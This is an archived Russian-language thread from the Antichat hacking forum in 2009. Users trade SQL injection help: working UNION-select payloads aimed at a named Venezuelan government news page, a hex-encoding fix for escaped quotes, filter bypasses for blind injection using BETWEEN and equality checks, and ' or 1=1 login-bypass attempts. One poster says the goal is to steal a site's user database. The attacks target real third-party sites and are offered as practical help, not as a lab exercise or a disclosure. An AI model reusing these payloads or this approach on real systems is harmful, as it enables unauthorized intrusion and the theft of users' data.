ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.09.2009, 19:32
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
ps
%3E
Неработает  |
|
|
27.09.2009, 19:41
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737
Репутация:
180
|
|
Можете кто нить разжевать в чем проблема.
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,table_name,3,4,5,6,7,8,9,10+fro m+INFORMATION_SCHEMA.tables+limit+6,1--
Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--
и мне выдает ошибку
Database error: Invalid SQL: SELECT * FROM noticias where id_noticia = -321 UNION SELECT 1,COLUMN_NAME,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=PROFILING limit 0,1--
MySQL Error: 1054 (Unknown column 'PROFILING' in 'where clause')
Session halted.
че за херня ?( |
|
|
|
27.09.2009, 19:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Вывод дает PROFILING (я так понял это имя таблици), делаю дальше
Цитата:
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=PRO FILING+limit+0,1--
потому что надо имя таблицы брать в кавычки
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='PR OFILING'+limit+0,1--
но у тебя они слэшируются, значит переводи в hex
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10+fr om+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x5 0524f46494c494e47--
|
|
|
|
27.09.2009, 19:50
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
как правильно использовать SQL Hex?
Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
Нужно ещё что-то перед хексом прописать?
|
|
|
|
27.09.2009, 20:01
|
|
Постоянный
Регистрация: 06.06.2007
Сообщений: 575
Провел на форуме:
1180737
Репутация:
180
|
|
потому что надо имя таблицы брать в кавычки
но у тебя они слэшируются, значит переводи в hex
едрён батон, так вот почему у меня в старых записках в хексе было написано это  )) спс
|
|
|
|
27.09.2009, 20:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Ctacok
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
Ну например заюзать between
1' and 1=if(ascii(substring(user(),1,1)) between 0 and 150,1,0)--+
Сообщение от Byrger
Допустим login=0x73716C696E6A666C6432 Ничего не выдаёт
А ты уверен, что что-то должно выдавать именно на этот логин? =)
Перевести название таблицы/колонки в hex или в CHAR, кому как нравится
Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
union+select+1,table_rows+from+information_schema. tables+where+table_name=0x7573657273
Некоторые индивидумы умудряются загонять в хекс или чар вместе с кавычками, тоесть так 'users'=27757365727327, так делать ненадо, база этого не оценит )
Какбэ и все
|
|
|
|
27.09.2009, 20:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Ctacok
Есть SQL запрос.
1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0') '2
Т.е. ' нефильтруется и т.п.
НО
Фильтруется > на _.
Что делать?
ps
%3E
Неработает дык делать просто "=" и пройтись по всем нужным ASCII
|
|
|
|
27.09.2009, 20:20
|
|
Banned
Регистрация: 20.02.2008
Сообщений: 3
Провел на форуме:
81426
Репутация:
0
|
|
Доброго времени суток.
имеется сайт на движке joomla (хз какая версия... - $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ (может кто подскажет что за версия))
путь к админке я нашёл, правда хз что с ней делать.
попробывал вот эту скуль index.php?option=com_content&task=vote&id=1&Itemid =1&cid=1&user_rating=1,rating_sum=[sql (любая цифра)] - на странице отобразилась шапка сайта и правая сторона, в середине всё пустое...(интересно что это даёт...).
затем нашёл путь _ http://sate.ru/plugins/content/highslide/ там рисунки.
в чём самый прикол то, что какие бы скуль инжект не забивал в строку вот таким способом - _ http://sate.ru/index.php..скульинжект то всё время показывает ошибку 404, а когда забиваю таким способом - _ http://sate/administrator/index.php..скульинжект то ни чего не выдаётся и не изменяется, просто как бы прогрузочка прошла и всё...а что изменилось или нет...хз....
так вот может кто подскажет что да как, может ссылочки какие даст кто, а то всё уже перечитал, хочу ещё чёнить почитать повтыкать, или совет какой попробывать....
А цель вообще всего этого, попробывать БД стянуть, не так давно на этом ресурсе 3 акка моих кто то спёр, вот хочу попробывать тоже...заодно разобраться во всём этом...)))
зы. знаю 100% что другте люди тырят от туда базу, это очевидно по тому что мои данные стырили....
зыы. попробывал методы которые описываются здесь реакции ноль... |
|
|
|
27.09.2009, 20:21
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Работает или Microsoft-IIS/5.0 Htaccess?
надо сделать запрет на выполнение пхп
Код:
RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3
он его не воспринимает вообще,если оно так и должно быть то как найти вход?
Последний раз редактировалось Shadrin; 27.09.2009 в 20:23..
|
|
|
|
27.09.2009, 22:44
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Shadrin, .ht* только для apache!
Есть бажный сайт, при подставке кавычки в авторизацию пишет
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
select * from customers where customers_email_address='''
[TEP STOP]
Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
